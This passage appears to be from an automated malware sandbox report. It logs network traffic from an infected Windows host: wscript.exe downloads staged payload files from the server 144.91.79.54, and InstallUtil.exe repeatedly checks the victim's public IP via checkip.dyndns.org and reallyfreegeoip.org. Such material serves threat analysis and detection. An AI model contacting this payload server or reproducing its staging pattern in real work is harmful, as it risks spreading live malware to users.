                          Aug 27, 2024 20:03:50.311753035 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.372492075 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.373975992 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.374010086 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.431499004 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.432010889 CEST44349763188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.432068110 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.432467937 CEST49763443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.512439013 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.512562990 CEST44349764188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:50.512619019 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.513196945 CEST49764443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:50.517934084 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.524003983 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:50.524085045 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.524183035 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:50.530911922 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.098942995 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.100172997 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100219965 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.100282907 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100564003 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.100574017 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.142062902 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.565424919 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.567104101 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.567127943 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727400064 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727494001 CEST44349766188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:51.727539062 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.728086948 CEST49766443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:51.732095957 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.733449936 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.737957954 CEST8049765158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.738013983 CEST4976580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.738627911 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:51.738692045 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.738770962 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:51.744000912 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:52.927912951 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:52.946605921 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.946655035 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:52.946732998 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.950464964 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:52.950479031 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:52.985814095 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.461765051 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.463619947 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.463639021 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.734950066 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.735039949 CEST44349768188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:53.735090017 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.735692978 CEST49768443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:53.766474962 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.767621994 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.772370100 CEST8049767158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:53.772439003 CEST4976780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.772984028 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:53.773045063 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.773138046 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:53.778053045 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:54.681615114 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:54.683866024 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.683907986 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:54.683979034 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.684242010 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:54.684252977 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:54.735800028 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.169342041 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.172349930 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.172382116 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320142031 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320240021 CEST44349770188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:55.320486069 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.320871115 CEST49770443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:55.325155973 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.326131105 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.330975056 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:55.331048012 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.331221104 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.331235886 CEST8049769158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:55.331425905 CEST4976980192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:55.337106943 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:56.602490902 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:56.603857040 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.603904009 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:56.603955984 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.604264021 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:56.604279041 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:56.657676935 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.085655928 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.087487936 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.087524891 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238568068 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238646030 CEST44349774188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.238907099 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.239326000 CEST49774443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.242753029 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.244060040 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.249627113 CEST8049773158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.249689102 CEST4977380192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.250694036 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.250830889 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.250965118 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:57.260797977 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.833131075 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:03:57.834872961 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.834928036 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.835093975 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.835407019 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:57.835417986 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:57.876465082 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:03:58.330503941 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.332382917 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:58.332401991 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489597082 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489692926 CEST44349777188.114.97.3192.168.2.6
                          Aug 27, 2024 20:03:58.489799023 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:03:58.490489960 CEST49777443192.168.2.6188.114.97.3
                          Aug 27, 2024 20:04:28.512856007 CEST8049727158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:28.512949944 CEST4972780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:34.792697906 CEST8049737158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:34.794965982 CEST4973780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:39.067240953 CEST4970680192.168.2.6199.232.214.172
                          Aug 27, 2024 20:04:39.073620081 CEST8049706199.232.214.172192.168.2.6
                          Aug 27, 2024 20:04:39.073679924 CEST4970680192.168.2.6199.232.214.172
                          Aug 27, 2024 20:04:47.315859079 CEST8049750158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:47.315933943 CEST4975080192.168.2.6158.101.44.242
                          Aug 27, 2024 20:04:54.808978081 CEST8049762158.101.44.242192.168.2.6
                          Aug 27, 2024 20:04:54.809077024 CEST4976280192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:03.073719978 CEST8049775158.101.44.242192.168.2.6
                          Aug 27, 2024 20:05:03.073777914 CEST4977580192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:09.798929930 CEST4973780192.168.2.6158.101.44.242
                          Aug 27, 2024 20:05:09.809067965 CEST8049737158.101.44.242192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 27, 2024 20:03:15.905700922 CEST | 61810 | 53 | 192.168.2.6 | 1.1.1.1
Aug 27, 2024 20:03:15.914675951 CEST | 53 | 61810 | 1.1.1.1 | 192.168.2.6
Aug 27, 2024 20:03:17.500139952 CEST | 55301 | 53 | 192.168.2.6 | 1.1.1.1
Aug 27, 2024 20:03:17.509916067 CEST | 53 | 55301 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 27, 2024 20:03:15.905700922 CEST | 192.168.2.6 | 1.1.1.1 | 0xe5c6 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:17.500139952 CEST | 192.168.2.6 | 1.1.1.1 | 0x2d2f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:15.914675951 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5c6 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:17.509916067 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d2f | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:17.509916067 CEST | 1.1.1.1 | 192.168.2.6 | 0x2d2f | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Aug 27, 2024 20:03:19.814389944 CEST | 1.1.1.1 | 192.168.2.6 | 0xf9a2 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 27, 2024 20:03:19.814389944 CEST | 1.1.1.1 | 192.168.2.6 | 0xf9a2 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                          • reallyfreegeoip.org
                          • 144.91.79.54
                          • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49715 | 144.91.79.54 | 80 | 6504 | C:\Windows\SysWOW64\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Aug 27, 2024 20:03:15.856900930 CEST | 176 | OUT | GET /2508/s HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
Aug 27, 2024 20:03:16.529284954 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 16 Aug 2024 03:06:04 GMT
                          ETag: "7558-61fc43d62b74b"
                          Accept-Ranges: bytes
                          Content-Length: 30040
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
Aug 27, 2024 20:03:16.704832077 CEST | 176 | OUT | GET /2508/r HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
Aug 27, 2024 20:03:16.912512064 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Sun, 25 Aug 2024 00:50:37 GMT
                          ETag: "8c00-62077658a4a62"
                          Accept-Ranges: bytes
                          Content-Length: 35840
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
Aug 27, 2024 20:03:17.016016006 CEST | 199 | OUT | GET /2508/ThXb4tU1jp1fQQFsQkY1.txt HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
Aug 27, 2024 20:03:17.233051062 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:17 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Mon, 26 Aug 2024 22:10:12 GMT
                          ETag: "22800-6209d638da8ee"
                          Accept-Ranges: bytes
                          Content-Length: 141312
                          Keep-Alive: timeout=5, max=98
                          Connection: Keep-Alive
                          Content-Type: text/plain


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          1 | 192.168.2.6 | 49716 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:15.927800894 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:16.507905960 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:16 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 627cbed739efe013907c0fc63c07d34b
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:16.525433064 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:17.455646038 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:17 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 35811a314dbf562e2d0d6e1361f04827
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:18.652951002 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:19.989769936 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:19 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: e7468dbb7d551732572365905b66e068
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          2 | 192.168.2.6 | 49718 | 144.91.79.54 | 80 | 6504 | C:\Windows\SysWOW64\wscript.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:17.764951944 CEST | 176 | OUT | GET /2508/v HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:18.409110069 CEST | 762 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Fri, 16 Aug 2024 03:14:55 GMT
                          ETag: "1de-61fc45d0b8951"
                          Accept-Ranges: bytes
                          Content-Length: 478
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:18.512171030 CEST | 179 | OUT | GET /2508/file HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          Accept-Language: en-CH
                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                          Host: 144.91.79.54
                          Aug 27, 2024 20:03:18.705929995 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:18 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Wed, 21 Aug 2024 05:14:58 GMT
                          ETag: "1030-6202a9f95545c"
                          Accept-Ranges: bytes
                          Content-Length: 4144
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:18.705961943 CEST | 1236 | IN |
                          Aug 27, 2024 20:03:18.705975056 CEST | 1236 | IN |
                          Aug 27, 2024 20:03:18.706423044 CEST | 721 | IN |


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          3 | 192.168.2.6 | 49723 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:20.632390022 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:21.653367996 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:21 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 6918a0d78379da83e8fbc45759cde3c5
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          4 | 192.168.2.6 | 49727 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:22.305759907 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:23.513962984 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:23 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: d693789a629cab29c6510d7da97f59e6
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          5 | 192.168.2.6 | 49729 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:24.330554962 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:25.625905037 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:25 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 29f4ec91b941e9d20bb01af7a007a009
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          6 | 192.168.2.6 | 49732 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:26.609898090 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:27.184379101 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:27 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 1eff21307638fc9f4a963336deb51a0f
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.6 | 49734 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:28.009727955 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:28.581563950 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:28 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: c9b366cf6a84c87a643f32b13b7b2955
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.6 | 49737 | 158.101.44.242 | 80 | 5392 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:29.226716995 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:29.793914080 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:29 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: c615e15c2c21736324d94cfe865bfcf3
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.6 | 49742 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 27, 2024 20:03:37.763123989 CEST | 151 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Connection: Keep-Alive
                          Aug 27, 2024 20:03:38.426175117 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 23c1157d41595faf4f57ac7cf960bb89
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:38.472599983 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:38.641663074 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 404f8ff0f5ec10ffb4a8958f21023a5b
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                          Aug 27, 2024 20:03:39.473717928 CEST | 127 | OUT | GET / HTTP/1.1
                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                          Host: checkip.dyndns.org
                          Aug 27, 2024 20:03:39.671489954 CEST | 320 | IN | HTTP/1.1 200 OK
                          Date: Tue, 27 Aug 2024 18:03:39 GMT
                          Content-Type: text/html
                          Content-Length: 103
                          Connection: keep-alive
                          Cache-Control: no-cache
                          Pragma: no-cache
                          X-Request-ID: 99213cb7fe616d90e1828c748155fc7b
                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.6 | 49746 | 158.101.44.242 | 80 | 948 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Timestamp | Bytes transferred | Direction | Data
